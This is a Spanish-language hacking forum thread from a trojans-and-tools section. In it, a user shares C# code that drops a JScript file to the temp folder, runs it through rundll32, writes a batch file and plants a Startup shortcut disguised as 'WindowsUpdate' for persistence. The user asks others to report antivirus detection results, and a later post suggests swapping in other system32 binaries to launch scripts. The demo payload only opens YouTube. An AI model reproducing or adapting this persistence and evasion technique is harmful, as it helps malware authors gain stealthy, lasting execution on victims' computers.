Mostrar mensajes previos
Ordenar por
por ard93 Delirios esporádicos
Hola buenas, hace mucho que no posteo nada, y me duele en el alma que las comunidades hispanas esten un poco muertas.
Os dejo aqui algo que pense de camino a casa... xD No se a cuanto estara, si alguien lo analiza que postee el scan porfavor.

Código: Seleccionar todo

using System.Diagnostics; 
using System.IO; 

namespace RunBatWithJavascript { 

static class Program { static void Main() { string command = "shell32.dll,ShellExec_RunDLL "; //path js drop string tempjs = @"C:\Users\pc\AppData\Local\Temp\1.js"; string path = Path.GetTempPath() + "1.js"; //javascript bat drop and persistence string text = "var fso=new ActiveXObject('Scripting.FileSystemObject'),WshShell=WScript.CreateObject('WScript.Shell'),temp=WshShell.ExpandEnvironmentStrings('%TEMP%'),fh=fso.CreateTextFile(temp+'/file.bat',!0);fh.WriteLine('start https://www.youtube.com/'),fh.Close(),strDesktop=WshShell.SpecialFolders('Startup');var oShellLink=WshShell.CreateShortcut(strDesktop+'\\WindowsUpdate.lnk');oShellLink.TargetPath=WScript.ScriptFullName,oShellLink.Description='WindowsUpdate',oShellLink.WorkingDirectory=temp+'/file.bat',oShellLink.Save();"; File.WriteAllText(path, text); string exe = "C:\\Windows\\System32\\rundll32.exe"; Process.Start(exe, command + tempjs); } } }
[Enlace externo eliminado para invitados]
 
Cuida de tu barrio, que el mundo ya está bastante jodido...
por DSR! Benevolent dictator for life
Muy buena idea! Una solución bastante creativa realmente

Código: Seleccionar todo

{******************************************************************************}
{** WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING  **}
{******************************************************************************}
{**                                                                          **}
{** The prototypes, declarations and information in this file has been       **}
{** compiled from various sources as well as through reverse engineering     **}
{** techniques. We make no guarantee as to the correctness of the contents.  **}
{** Caution is recommended, USE AT YOUR OWN RISK.                            **}
{**                                                                          **}
{******************************************************************************}
por ard93 Delirios esporádicos
Con esto puedes jugar con cualquier tipo de lenguaje Script, hay mil formas de jugar con este code, piensa en cada .exe .dll q hay en system32, yo use el rundll32 para ejecutarlo, pero puedes usar otro, e incluso omitir el Process.Start..
Imagen
Cuida de tu barrio, que el mundo ya está bastante jodido...
Temas Recientes
Links sobre el tema
Variantes de tema
Responder

Volver a “Troyanos y Herramientas”